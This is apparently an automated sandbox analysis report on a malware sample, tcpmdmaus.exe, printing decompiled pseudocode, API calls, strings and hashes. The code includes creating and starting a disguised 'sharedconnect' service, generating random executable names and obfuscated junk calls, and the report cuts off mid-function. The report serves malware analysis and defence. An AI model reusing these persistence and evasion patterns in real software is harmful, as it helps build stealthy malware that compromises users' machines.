0x00957d51
0x00957d7b

APIs

_snwprintf.NTDLL ref: 00957D6E

Strings

\, xrefs: 00957D19
e, xrefs: 00957D27
s, xrefs: 00957D20
%, xrefs: 00957D12

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: _snwprintf
String ID: %$\$e$s
API String ID: 3988819677-949967917
Opcode ID: d0d85c926b31a5665c8784492ed3c8113beced83c56a7f13c3ec6ae077f753d8
Instruction ID: 9fecf567c206acb27a92b19ad2f28dd228a63a2c4ecda54c18a41dd93ab51df4
Opcode Fuzzy Hash: d0d85c926b31a5665c8784492ed3c8113beced83c56a7f13c3ec6ae077f753d8
Instruction Fuzzy Hash: C9F0E9B0D442085BC700FFE298157AEB6749F8070BF504158EC046A241DBBA075D47EB

Uniqueness

Uniqueness Score: -1.00%

Function 009572E0, Relevance: 7.5, APIs: 5, Instructions: 37
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E009572E0(void* __eflags) {
				void* _t1;
				long _t4;
				long _t9;
				int _t11;

				_t11 = 0;
				if(L00957160(_t1) != 0) {
					_t4 = WaitForSingleObject( *0x95a834, 0);
					if(_t4 == 0 || _t4 == 0x80) {
						if(L009571E0(_t4) != 0) {
							if(L00957260(_t5) != 0) {
								_t9 = SignalObjectAndWait( *0x95a82c,  *0x95a828, 0xffffffff, 0);
								if(_t9 == 0 || _t9 == 0x80) {
									_t11 = ResetEvent( *0x95a82c);
								}
							}
							ReleaseMutex( *0x95a834);
							CloseHandle( *0x95a834);
						}
					}
				}
				return _t11;
			}

0x009572e1
0x009572ea
0x009572f3
0x009572fb
0x0095730b
0x00957314
0x00957326
0x0095732e
0x00957343
0x00957343
0x0095732e
0x0095734b
0x00957357
0x00957357
0x0095730b
0x009572fb
0x00957360

APIs

WaitForSingleObject.KERNEL32(00000000,?,009574E0,?,00957B68), ref: 009572F3
SignalObjectAndWait.KERNEL32(000000FF,00000000,?,009574E0,?,00957B68), ref: 00957326
ResetEvent.KERNEL32(?,009574E0,?,00957B68), ref: 0095733D
ReleaseMutex.KERNEL32(?,009574E0,?,00957B68), ref: 0095734B
CloseHandle.KERNEL32(?,009574E0,?,00957B68), ref: 00957357

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: ObjectWait$CloseEventHandleMutexReleaseResetSignalSingle
String ID:
API String ID: 3756552044-0
Opcode ID: abefc9350a2cc3b5024f6488de558e134e01b324c946d844b8e6a9521aa05ad9
Instruction ID: 04add0a1a988bbf09e3be4e0592fd6576fc091fcaff4b3930b1f7eeebfd63b32
Opcode Fuzzy Hash: abefc9350a2cc3b5024f6488de558e134e01b324c946d844b8e6a9521aa05ad9
Instruction Fuzzy Hash: FEF0FF3152D3119BDF215BB3BC09B29BEA9AF05363F194221FE00D01B0EA21CA19F75A

Uniqueness

Uniqueness Score: -1.00%

Function 009511A3, Relevance: 7.5, APIs: 5, Instructions: 22COMMON

Download Yara Rule

APIs

_snwprintf.NTDLL ref: 009511A3
CreateEventW.KERNEL32(?,00000001,?,?), ref: 009511B7
SetEvent.KERNEL32(00000000,?,00000001,?,?), ref: 009511C4
CloseHandle.KERNEL32(00000000,?,00000001,?,?), ref: 009511CB
CloseHandle.KERNEL32(00000000), ref: 009511DA

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$Create_snwprintf
String ID:
API String ID: 2675716504-0
Opcode ID: 5469bdf89360f1a1d94afea53c0262411960c37fe6d7c2043055c44f2e931203
Instruction ID: f5f1264000900acb7895c7baff1dda7b806eb5270fa0abf1048e10f67def9b7f
Opcode Fuzzy Hash: 5469bdf89360f1a1d94afea53c0262411960c37fe6d7c2043055c44f2e931203
Instruction Fuzzy Hash: 2EE04F32C25710ABC3225B239C48BAE3A7CEF4D713F050255FD0592210DB758985DB56

Uniqueness

Uniqueness Score: -1.00%

Function 00958220, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00958220(WCHAR* __ecx) {
				WCHAR* _t19;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				void* _t28;

				_t19 = __ecx;
				lstrcpyW(__ecx, 0x95adc0);
				_t23 = lstrlenW(_t19);
				_t19[_t23] = 0x5c;
				_t24 = _t23 + 1;
				_t28 = (GetTickCount() & 0x0000000f) + 4;
				L00952040( &(_t19[_t24]), _t28);
				_t25 = _t24 + _t28;
				_t19[_t25] = 0x65002e;
				 *((intOrPtr*)(_t19 + 4 + _t25 * 2)) = 0x650078;
				 *((short*)(_t19 + 8 + _t25 * 2)) = 0;
				return 0;
			}

0x00958223
0x0095822b
0x00958238
0x0095823f
0x00958243
0x00958252
0x00958257
0x0095825c
0x00958260
0x00958267
0x0095826f
0x00958277

APIs

lstrcpyW.KERNEL32(?,0095ADC0), ref: 0095822B
lstrlenW.KERNEL32(?,?,0095ADC0), ref: 00958232
GetTickCount.KERNEL32 ref: 00958244

Strings

x, xrefs: 00958267

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CountTicklstrcpylstrlen
String ID: x
API String ID: 974621299-2363233923
Opcode ID: cc14e31b01543d86a656939d1ea088376807a770327bc13dcd9cf43f82819be8
Instruction ID: 921541a0a6450b159b499cf9e276bf15be02332248bac04a486cd5f552207688
Opcode Fuzzy Hash: cc14e31b01543d86a656939d1ea088376807a770327bc13dcd9cf43f82819be8
Instruction Fuzzy Hash: 54F0E5B7A193146BD7105FA1DC846063BA5EF84353B045075EC05DB256DB79C80487E5

Uniqueness

Uniqueness Score: -1.00%

Function 00958648, Relevance: 6.0, APIs: 4, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00958648(void* __ecx) {
				int _t10;
				void* _t16;

				 *0x95a7cc();
				_push(_t16 - 0x20);
				_push( *(_t16 - 4));
				if(L00951EE0(_t16 - 0x430) != 0) {
					CloseHandle( *(_t16 - 0x20));
					CloseHandle( *(_t16 - 0x1c));
				}
				_t10 = CloseHandle( *(_t16 - 4));
				return _t10;
			}

0x00958648
0x0095865a
0x0095865b
0x00958669
0x0095866e
0x00958677
0x00958677
0x00958680
0x0095868a

APIs

_snwprintf.NTDLL ref: 00958648
CloseHandle.KERNEL32(?), ref: 0095866E
CloseHandle.KERNEL32(?), ref: 00958677
CloseHandle.KERNEL32(?), ref: 00958680

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CloseHandle$_snwprintf
String ID:
API String ID: 2398838028-0
Opcode ID: e2e6bee63d8412b18545530fe9e82e7db3ddb57705e844477139512a93c993db
Instruction ID: 644f7fbb1755f38100fc9bacdaa4c5a2d494a464b945bf41963e875a8d97016e
Opcode Fuzzy Hash: e2e6bee63d8412b18545530fe9e82e7db3ddb57705e844477139512a93c993db
Instruction Fuzzy Hash: 77E09271C25219DBCF11ABD5ED05AED7739FB0C306F044651E905A1021D7364A24EB55

Uniqueness

Uniqueness Score: -1.00%

Function 00958142, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

_snwprintf.NTDLL ref: 00958185

Strings

", xrefs: 0095815D
s, xrefs: 00958178

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: _snwprintf
String ID: "$s
API String ID: 3988819677-4234971836
Opcode ID: 14bddca3ec4920cdfd6a1792e5885426cf052975d82eca7ddee9c25a5b36d64c
Instruction ID: 3c28836f096368cdea638f6aaec58f45ec23448fed249c5c536de115638fef96
Opcode Fuzzy Hash: 14bddca3ec4920cdfd6a1792e5885426cf052975d82eca7ddee9c25a5b36d64c
Instruction Fuzzy Hash: C501C470654308A7D721DB969CC9BFFB67CAF44712F004266FD09B2181EBB08A49975A

Uniqueness

Uniqueness Score: -1.00%

Function 00958500, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00958500(WCHAR* __ecx) {
				WCHAR* _t19;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				void* _t28;

				_t19 = __ecx;
				 *0x95a67c(0, 0x23, 0, 0, __ecx);
				_t23 = lstrlenW(__ecx);
				 *((short*)(_t19 + _t23 * 2)) = 0x5c;
				_t24 = _t23 + 1;
				_t28 = (GetTickCount() & 0x0000000f) + 4;
				L00952040(_t19 + _t24 * 2, _t28);
				_t25 = _t24 + _t28;
				 *((intOrPtr*)(_t19 + _t25 * 2)) = 0x65002e;
				 *((intOrPtr*)(_t19 + 4 + _t25 * 2)) = 0x650078;
				 *((short*)(_t19 + 8 + _t25 * 2)) = 0;
				return 0;
			}

0x00958503
0x0095850e
0x0095851b
0x00958522
0x00958526
0x00958535
0x0095853a
0x0095853f
0x00958543
0x0095854a
0x00958552
0x0095855a

APIs

lstrlenW.KERNEL32 ref: 00958515
GetTickCount.KERNEL32 ref: 00958527

Strings

x, xrefs: 0095854A

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CountTicklstrlen
String ID: x
API String ID: 2992449761-2363233923
Opcode ID: 3023b3d6ad8052828a47f11540894b58754c742297609cc8076cdc28b3ae87ec
Instruction ID: 494a2575c39287f1a6254265038b54ecec5de1888f0dc43bd706d475f757e65d
Opcode Fuzzy Hash: 3023b3d6ad8052828a47f11540894b58754c742297609cc8076cdc28b3ae87ec
Instruction Fuzzy Hash: 36F020B3A293046BE7205FA0DC88B063AA5EF88353F044070EE05EF292DBB5CC0087E5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: tcpmdmaus.exe PID: 3200 Parent PID: 5368 tcpmdmaus.exeCOMMON

Execution Graph

Execution Coverage:	13.7%
Dynamic/Decrypted Code Coverage:	98%
Signature Coverage:	7.3%
Total number of Nodes:	548
Total number of Limit Nodes:	24

Executed Functions

Function 00CD8142, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 59
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 34%

			E00CD8142() {
				void* _t22;
				void* _t23;
				void* _t30;
				int _t32;
				void* _t34;

				 *((intOrPtr*)(_t34 - 4)) = 0;
				_t30 = OpenSCManagerW(_t32, _t32, ??);
				if(_t30 != 0) {
					 *((intOrPtr*)(_t34 - 0x10)) = 0x250022;
					 *((short*)(_t34 - 8)) = 0;
					 *((intOrPtr*)(_t34 - 0xc)) = 0x220073;
					 *0xcda7cc(_t34 - 0x218, 0x104, _t34 - 0x10, "C:\Windows\SysWOW64\sharedconnect.exe", _t22);
					_t23 = CreateServiceW(_t30, "sharedconnect", "sharedconnect", 0x12, 0x10, 2, _t32, _t34 - 0x218, _t32, _t32, _t32, _t32, _t32);
					if(_t23 != 0) {
						_t17 = L00CD7EE0(_t16, _t30, _t34 - 4, _t30); // executed
						if(_t17 != 0) {
							goto 0xe31b3b;
							asm("int3");
							asm("int3");
							 *0xcda5ec();
							_t17 = E00CD18C0(_t32);
							_t32 = 0;
						}
					} else {
						asm("int 0xcc");
						_t23 = OpenServiceW(??, ??, ??);
					}
					if(_t23 != 0) {
						_t32 = StartServiceW();
						_t17 = CloseServiceHandle(_t23);
					}
					L00CD80B0(_t17, _t30);
					CloseServiceHandle(_t30);
				}
				return _t32;
			}

0x00cd8142
0x00cd8151
0x00cd8155
0x00cd815d
0x00cd8165
0x00cd8178
0x00cd8185
0x00cd81b2
0x00cd81b6
0x00cd81cf
0x00cd81d6
0x00cd81d8
0x00cd81dd
0x00cd81de
0x00cd81df
0x00cd81e7
0x00cd81ec
0x00cd81ec
0x00cd81b8
0x00cd81be
0x00cd81c6
0x00cd81c6
0x00cd81f0
0x00cd81fe
0x00cd8200
0x00cd8200
0x00cd8208
0x00cd820e
0x00cd8214
0x00cd821c

APIs

OpenSCManagerW.ADVAPI32 ref: 00CD814B
_snwprintf.NTDLL ref: 00CD8185
CreateServiceW.ADVAPI32(00000000,sharedconnect,sharedconnect,00000012,00000010,00000002,?,?), ref: 00CD81AC

Strings

C:\Windows\SysWOW64\sharedconnect.exe, xrefs: 00CD816C
s, xrefs: 00CD8178
", xrefs: 00CD815D
sharedconnect, xrefs: 00CD81A1, 00CD81A6

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CreateManagerOpenService_snwprintf
String ID: "$C:\Windows\SysWOW64\sharedconnect.exe$s$sharedconnect
API String ID: 2040870185-1699388139
Opcode ID: ad6946e0ea132b84800c491e26f7df730c20955cd872ec7383f507094de211f1
Instruction ID: 7e2df75132fe92b02e3551b0bb540c2272a8377136b3873b78511dd8f09fcf93
Opcode Fuzzy Hash: ad6946e0ea132b84800c491e26f7df730c20955cd872ec7383f507094de211f1
Instruction Fuzzy Hash: D801D670641318E7D7119B948CC9BFEB77CEF44710F1441A7FA04F2281EFB09A0A9656

Uniqueness

Uniqueness Score: -1.00%

Function 003B14C9, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 259
filewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E003B14C9() {
				void* _v16;
				void* _v36;
				intOrPtr _v40;
				signed int _v44;
				short _v46;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				long _v64;
				signed int _v68;
				signed int _v82;
				signed int _v84;
				signed int _v88;
				void* _v92;
				char* _v96;
				void** _v104;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v332;
				void* _v352;
				intOrPtr _v356;
				struct _ICONINFO _v376;
				char _v610;
				intOrPtr _v616;
				intOrPtr _v652;
				void* _v660;
				char _v664;
				intOrPtr _v668;
				void* _v696;
				char _v700;
				char* _v704;
				intOrPtr* _v708;
				intOrPtr _v712;
				intOrPtr _v716;
				signed int _v720;
				CHAR* _v724;
				DWORD* _v728;
				intOrPtr _v732;
				signed int _v736;
				intOrPtr _v740;
				signed int _v744;
				intOrPtr _v748;
				signed int _v752;
				long _v756;
				intOrPtr _v760;
				int _v764;
				int _v768;
				struct _ICONINFO* _v772;
				struct HICON__* _v776;
				long _v793;
				intOrPtr _v800;
				signed int _v801;
				short _v802;
				intOrPtr _v804;
				void* _v816;
				signed int _v820;
				intOrPtr _v828;
				signed int _v832;
				void* _v836;
				intOrPtr _v840;
				long _v841;
				long _v842;
				intOrPtr _v844;
				int _v852;
				intOrPtr _v872;
				intOrPtr _v884;
				intOrPtr _v888;
				intOrPtr _v892;
				intOrPtr _v900;
				intOrPtr _v904;
				intOrPtr _t144;
				signed int _t145;
				int _t146;
				intOrPtr _t147;
				int _t148;
				struct HICON__* _t150;
				void* _t151;
				struct HICON__* _t156;
				void* _t161;
				intOrPtr _t163;
				intOrPtr _t166;
				intOrPtr _t167;
				intOrPtr _t168;
				void* _t172;
				intOrPtr _t173;
				void* _t176;
				signed int _t177;
				intOrPtr _t183;
				CHAR* _t186;
				long _t188;
				signed int _t189;
				signed int _t190;
				intOrPtr _t192;
				intOrPtr _t202;
				void* _t204;
				void* _t227;
				signed int _t240;
				signed int _t252;
				void* _t255;

				_v36 = 0;
				_v40 = 0x440555f2;
				_v46 = 0xb400;
				_v52 = 0x76126aff;
				_t192 = _v40;
				_t240 = _v44;
				asm("sbb edi, edx");
				_v700 = 0x761272f5;
				_v44 = _t240 + 0x14c58f1d;
				_v60 = 0;
				_v64 = 0x8e773d56 - _t192;
				_v616 = 0x237b1133;
				_v696 = 0;
				_t186 =  &_v332;
				_v704 =  &_v610;
				_v708 = wsprintfA;
				_v712 = _t240;
				_v716 = _t192;
				_v720 = _v36;
				_v724 = _t186;
				_v728 =  &_v696;
				_t144 =  *_v708(_t186, "%S", _v704);
				_t255 = (_t252 & 0xfffffff8) - 0x348 + 0xc;
				_v732 = _t144;
				_t145 = GetBinaryTypeA(_v724, _v728);
				_v52 =  !_v720;
				_v744 = _t145;
				_t146 = ReleaseCapture();
				_v748 = _t146;
				_t147 =  *__imp__GetGUIThreadInfo(0x5fa,  &_v700);
				_v92 = 0;
				_v760 = _t147;
				_t148 = DuplicateHandle(0, 0, 0,  &_v92, _v68 + 0x89ed98db, 0x736, _v68 + 0x89ed98db); // executed
				_v44 = _v736;
				_v48 = _v732;
				_t188 = _v716 - _v68;
				_v764 = _t148;
				_v768 = LockFile(0, _t188, _t188, _v68 ^ 0x76126cc0, 0x1ac);
				_v772 =  &(_v376.xHotspot);
				_t150 = CreateIconIndirect( &(_v376.xHotspot));
				_v660 = 0;
				_v776 = _t150;
				goto L17;
				do {
					while(1) {
						L17:
						_t151 = _v660;
						_v352 = _t151;
						_t202 = _t151 - 1;
						_v836 = _t151;
						_v840 = _t202;
						if(_t202 == 0) {
							goto L21;
						}
						_t183 = _v836 - 5;
						_v844 = _t183;
						if(_t183 == 0) {
							L1:
							_v802 = GlobalDeleteAtom(0x3a);
						} else {
						}
						L16:
						_v832 = _v356 + 1;
						_t156 = CreateIconIndirect( &_v376);
						_t204 = _v836;
						_v668 = _t204;
						_v52 = _v744;
						_v56 = _v740;
						_v68 = _v736 ^ 0x4ebe5432;
						_v840 = _t156;
						if(_t204 > 0x73) {
							_v96 =  &_v664;
							_v68 = _v736 + _v736;
							_t189 = _t188 & 0xffffff00 | __eflags > 0x00000000;
							__eflags = _v84;
							_t75 = _v84 != 0;
							__eflags = _t75;
							_t188 = _t189 & 0xffffff00 | _t75;
							_v793 = _t188;
							_v800 = _v88 - 0x287c73b9;
							_v801 = _t188;
							if(_t75 != 0) {
								_v801 = _v793;
							}
							__eflags = _v801;
							if(__eflags != 0) {
								_t161 = _v88;
								_t255 = _t255 - 0xc;
								_t227 = _t255;
								 *((intOrPtr*)(_t227 + 8)) =  &_v664;
								 *(_t227 + 4) = "Card4G";
								_v816 = _t161;
								_v820 = _v84;
								L003C784C(); // executed
								_t190 = _t188 & 0xffffff00 | __eflags > 0x00000000;
								__eflags = _v832;
								_t97 = _v832 != 0;
								__eflags = _t97;
								_t188 = _t190 & 0xffffff00 | _t97;
								_v836 = _t161;
								_v840 = _v828 - 0x792c87a;
								_v841 = _t188;
								_v842 = _t188;
								if(_t97 != 0) {
									_v842 = _v841;
								}
								__eflags = _v842;
								if(__eflags != 0) {
									_t163 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
									__eflags =  *((intOrPtr*)(_t163 + 0xa4)) - 6;
									if( *((intOrPtr*)(_t163 + 0xa4)) < 6) {
										break;
									} else {
										_v804 = 0;
										_t172 = L003B1050();
										_t173 =  *((intOrPtr*)(_t172 + 0x3c));
										_t188 = _v756;
										_v64 = _t188;
										_v68 = _v752;
										__eflags =  *((intOrPtr*)(_t172 + _t173)) - (_v88 ^ 0x76122faf);
										_t176 =  ==  ? _t172 + _t173 : _v804;
										__eflags =  *((intOrPtr*)(_t176 + 0x48)) - (_v82 ^ 0x0000b405);
										if( *((intOrPtr*)(_t176 + 0x48)) > (_v82 ^ 0x0000b405)) {
											_t177 = L003B109B(); // executed
											_v820 = _t177;
										} else {
											break;
										}
									}
								} else {
									goto L1;
								}
							} else {
								break;
							}
							L24:
							_v904 = _v124;
							return 1;
						} else {
							continue;
						}
						L21:
						_v852 = CancelIo(0);
						goto L16;
					}
					_v104 =  &_v660;
					_v872 = _v652;
					_t166 =  *__imp__AddUsersToEncryptedFile(L"Swb4Ci$@pjWqJ",  &_v660);
					_v884 = _t166;
					_t167 =  *__imp__FlsGetValue(1);
					_v892 = _t167;
					_t168 =  *__imp__FlsFree(0x14a6f8);
					_v696 = 0x2e4de8af;
					__eflags = _v888 - 0x56f45d1e;
					_v900 = _t168;
				} while (__eflags >= 0);
				_v840 = _v120;
				goto L24;
			}

APIs

DuplicateHandle.KERNELBASE(00000000,00000000,00000000,?,?,00000736,?), ref: 003B1654
LockFile.KERNEL32(00000000,?,?,?,000001AC), ref: 003B16A6
CreateIconIndirect.USER32 ref: 003B16C5

Strings

Swb4Ci$@pjWqJ, xrefs: 003B1926

Memory Dump Source

Source File: 00000005.00000002.403172825.00000000003B1000.00000020.00020000.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000005.00000002.403164007.00000000003B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.403179139.00000000003B4000.00000020.00020000.sdmp Download File
Associated: 00000005.00000002.403204074.00000000003BD000.00000020.00020000.sdmp Download File
Associated: 00000005.00000002.403213945.00000000003BF000.00000020.00020000.sdmp Download File
Associated: 00000005.00000002.403221303.00000000003C3000.00000020.00020000.sdmp Download File
Associated: 00000005.00000002.403232139.00000000003C9000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.403239843.00000000003CA000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.403248499.00000000003CC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.403255480.00000000003CD000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.403289038.00000000003E0000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.403308785.00000000003ED000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.403319751.00000000003F3000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.403326884.00000000003F9000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3b0000_tcpmdmaus.jbxd

Similarity

API ID: CreateDuplicateFileHandleIconIndirectLock
String ID: Swb4Ci$@pjWqJ
API String ID: 997836486-4206937320
Opcode ID: c42f196758714df6a6d8335355f47472eff83e766ddb36f29b9983e8ff68f4f1
Instruction ID: 3f6a16f0f9272ec27de765e3af809d54d91353e383327e36e7414797e0fa7b63
Opcode Fuzzy Hash: c42f196758714df6a6d8335355f47472eff83e766ddb36f29b9983e8ff68f4f1
Instruction Fuzzy Hash: 7BC1F375A183808FC336CF69C490B9BBBE9BFC8304F54891EE58D97750DA70AA05CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00CD7F4D, Relevance: 4.5, APIs: 3, Instructions: 45
serviceCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E00CD7F4D() {
				void* _t16;
				void* _t20;
				void* _t21;
				void* _t25;
				void* _t28;
				void* _t33;
				short** _t35;
				void* _t38;
				void* _t39;

				if( *0xcda654() == 0) {
					_t28 =  *(_t39 - 0x20);
					L14:
					E00CD18C0( *((intOrPtr*)(_t39 - 0x18)));
					_t16 = _t33;
					if(_t33 == 0) {
						goto 0xe31a77;
						asm("int3");
						return _t16;
					} else {
						 *_t35 = _t28;
						return _t16;
					}
				}
				_t38 = (GetTickCount() & 0x0000000f) * 0x2c +  *((intOrPtr*)(_t39 - 0x18));
				_t20 =  *(_t39 - 0x10) * 0x2c + _t38;
				 *(_t39 - 0x20) = _t20;
				_t28 =  *(_t39 - 0x20);
				_t35 =  >=  ?  *((void*)(_t39 - 0x18)) : _t38;
				 *(_t39 - 4) = _t28;
				while(_t35 < _t20) {
					_t21 = OpenServiceW( *(_t39 - 0x1c),  *_t35, 1); // executed
					_t28 = _t21;
					if(_t28 != 0) {
						goto 0xe31a31;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						if( *0xcda5fc() == 0 && GetLastError() == 0x7a) {
							_t25 = E00CD1850( *((intOrPtr*)(_t39 - 0xc)));
							 *(_t39 - 4) = _t25;
							if(_t25 != 0) {
								goto 0xe31a4a;
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_t33 =  *0xcda5fc();
								if(_t33 == 0) {
									E00CD18C0( *(_t39 - 4));
								}
							}
						}
						CloseServiceHandle(_t28);
					}
					_t20 =  *(_t39 - 0x20);
					_t35 =  &(_t35[0xb]);
					if(_t33 == 0) {
						continue;
					} else {
						break;
					}
				}
				goto 0xe31a63;
				asm("int3");
				goto L14;
			}

0x00cd7f55
0x00cd8013
0x00cd7ffc
0x00cd7fff
0x00cd8004
0x00cd8008
0x00cd801a
0x00cd801f
0x00cd8020
0x00cd800a
0x00cd800b
0x00cd8012
0x00cd8012
0x00cd8008
0x00cd7f6b
0x00cd7f6e
0x00cd7f70
0x00cd7f75
0x00cd7f78
0x00cd7f7c
0x00cd7f80
0x00cd7f8b
0x00cd7f91
0x00cd7f95
0x00cd7f97
0x00cd7f9c
0x00cd7f9d
0x00cd7f9e
0x00cd7f9f
0x00cd7fa0
0x00cd7fa1
0x00cd7faa
0x00cd7fba
0x00cd7fbf
0x00cd7fc4
0x00cd7fc6
0x00cd7fcb
0x00cd7fcc
0x00cd7fcd
0x00cd7fce
0x00cd7fcf
0x00cd7fd0
0x00cd7fd7
0x00cd7fdb
0x00cd7fe0
0x00cd7fe0
0x00cd7fdb
0x00cd7fc4
0x00cd7fe6
0x00cd7fe6
0x00cd7fec
0x00cd7fef
0x00cd7ff4
0x00000000
0x00000000
0x00000000
0x00000000
0x00cd7ff4
0x00cd7ff6
0x00cd7ffb
0x00000000

APIs

EnumServicesStatusExW.ADVAPI32 ref: 00CD7F4D
GetTickCount.KERNEL32 ref: 00CD7F5B
OpenServiceW.ADVAPI32(?,?,00000001), ref: 00CD7F8B

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CountEnumOpenServiceServicesStatusTick
String ID:
API String ID: 3995870938-0
Opcode ID: 3e53fa7f591b755d0a2be8432f198f65de2462c3b021d6b5ab1f3facc2fe50e4
Instruction ID: 145b3f61d10e3ff707f046828f3096820bd3d6284a4d38ab772f09fbd682d598
Opcode Fuzzy Hash: 3e53fa7f591b755d0a2be8432f198f65de2462c3b021d6b5ab1f3facc2fe50e4
Instruction Fuzzy Hash: 80017132E09216CBCF208FE8DC856EDFBB5BF18341B15022BEE15B3350EB3599459A90

Uniqueness

Uniqueness Score: -1.00%

Function 00CD13AB, Relevance: 21.0, APIs: 2, Strings: 10, Instructions: 24
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00CD13AB(short __eax) {
				int _t19;
				void* _t20;

				 *((intOrPtr*)(_t20 - 0x28)) = 0x730025;
				 *((short*)(_t20 - 4)) = __eax;
